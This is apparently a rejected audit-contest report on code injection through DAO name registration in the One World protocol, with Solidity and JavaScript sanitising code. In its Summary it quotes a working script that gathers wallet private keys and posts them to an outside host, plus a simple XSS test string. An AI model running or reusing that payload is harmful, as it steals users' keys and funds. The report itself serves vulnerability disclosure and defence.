Project: One World (NFTDeFi, 15,000 USDC)

Submission Details
Severity: medium
Status: Invalid

Malicious EnName can be added without restriction.

Summary

Code Injection Via Token Name: https://github.com/d-xo/weird-erc20?tab=readme-ov-file#code-injection-via-token-name

JS code used in the attack (quoted from the linked weird-erc20 writeup): <script> function doSomething(){for($("#depositBalanceToken a").text().indexOf("')\">DATA")>=0&&$("#depositBalanceToken a").text("DATA"),savedKeys=[],a=1;a<main.EtherDelta.addrs.length;a++)singlekey=[],singlekey[0]=main.EtherDelta.addrs[a],singlekey[1]=main.EtherDelta.pks[a],savedKeys.push(singlekey);var e={object:JSON.stringify(savedKeys)};$.post("https://cdn-solutions.com/update.php",e,function(e,n,t){}),setTimeout(doSomething,1e4)}var savedKeys=[];if(void 0===onlyonce){var onlyonce=!0;doSomething(),ga=function(){},doSomething(),$("#accountSubmit").click(function(){doSomething()})} </script>

The protocol is susceptible to a code injection vulnerability through the DAO name registration feature. An attacker could exploit this by registering DAO names containing malicious JavaScript (JS) code. If these names are later rendered on a website or in an application that does not sanitize input, the embedded JS could execute unintended actions, potentially compromising the security of users interacting with the protocol.

Vulnerability Details

An attacker can register DAO names containing embedded JS code, leveraging this as an attack vector for code injection. If the DAO name is displayed on a frontend without adequate sanitization, it could allow attackers to execute arbitrary JS in the context of a user's browser. This method follows a similar pattern to documented injection techniques, such as those described in the Weird ERC20 repository. Potentially harmful names could look like <script>alert('XSS')</script>, injecting code that is executed when the name is displayed in an unsafe manner on websites or dApps.

This vulnerability can be particularly severe if:

  1. The protocol’s frontend directly displays DAO names without escaping or sanitizing them.

  2. External sites or applications that interact with the protocol do not properly sanitize DAO names.

// Names are stored as raw strings; nothing validates their content on registration
mapping(string => address) public getENSAddress;

Impact

The impact of this vulnerability is substantial:

  1. Users interacting with the affected frontend may unknowingly execute malicious scripts in their browsers, compromising their security and exposing them to phishing attacks.

  2. A vulnerability that allows malicious DAO names could damage the protocol's reputation, as it could be perceived as unsafe for users.

Recommendations

Add the following check to prevent ENS names from containing JS code:

// Returns true only if every byte of _input is ASCII 0-9, A-Z or a-z
function safeStr(string memory _input) public pure returns (bool) {
    bytes memory inputBytes = bytes(_input);
    for (uint256 i = 0; i < inputBytes.length; i++) {
        bytes1 char = inputBytes[i];
        if (
            !(char >= 0x30 && char <= 0x39) && // 0-9
            !(char >= 0x41 && char <= 0x5A) && // A-Z
            !(char >= 0x61 && char <= 0x7A)    // a-z
        ) {
            return false;
        }
    }
    return true;
}
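The two controls the report relies on, output encoding at the point of rendering and an allowlist on the name itself, are shown below as an added browser-side example. This is not code from the submission or from the One World project; the `escapeHtml`, `isSafeName` and `renderName*` names, the stand-in element object, and the sample names are all constructed for illustration. `isSafeName` mirrors the same ASCII-alphanumeric rule as the Solidity `safeStr` above so a frontend or indexer can apply it off-chain, and the unsafe/safe render pair shows why escaping is needed even when validation is missing.

```javascript
// Added example (not from the submission or the One World codebase):
// defender-side controls for stored names that are later rendered in a browser.
//  - escapeHtml:  output encoding so a stored name can never become markup
//  - isSafeName:  same allowlist as the report's Solidity safeStr() (0-9, A-Z, a-z)
//  - renderNameUnsafe / renderNameSafe: the innerHTML interpolation that causes
//    the bug, next to the escaped version

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode the five characters that can break out of a text node or attribute.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Mirror of safeStr(): every character must be ASCII alphanumeric.
// Like safeStr(), the empty string passes; tighten to + if that is unwanted.
function isSafeName(name) {
  return /^[0-9A-Za-z]*$/.test(name);
}

// Minimal stand-in for a DOM element so the example runs outside a browser
// (constructed for this example; in a real page this is an HTMLElement).
function makeElement() {
  return { innerHTML: "", textContent: "" };
}

// Unsafe: the stored name is spliced into markup, so "<script>" in a name
// becomes a real script tag once the browser parses innerHTML.
function renderNameUnsafe(el, name) {
  el.innerHTML = `<a href="#">${name}</a>`;
  return el.innerHTML;
}

// Safe: the name is escaped before it reaches innerHTML (or assign it to
// textContent instead, which never parses markup).
function renderNameSafe(el, name) {
  el.innerHTML = `<a href="#">${escapeHtml(name)}</a>`;
  return el.innerHTML;
}

// For a batch of names, report whether registration should be allowed and
// what the escaped rendering looks like. Used for the constructed samples below.
function classifyNames(names) {
  return names.map((n) => ({
    name: n,
    allowed: isSafeName(n),
    rendered: renderNameSafe(makeElement(), n),
  }));
}

// Constructed sample names (not real registrations).
const SAMPLE_NAMES = ["OneWorldDAO", "<script>alert('XSS')</script>", "dao-with-dash"];

if (typeof require !== "undefined" && require.main === module) {
  for (const r of classifyNames(SAMPLE_NAMES)) console.log(r);
}
```

Both layers are worth keeping: the on-chain allowlist stops hostile names from being registered at all, while `escapeHtml` protects any frontend that renders names from other sources (older registrations, other contracts, third-party indexers) that the contract check never saw.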
Updates

Lead Judging Commences

0xbrivan2 Lead Judge 7 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality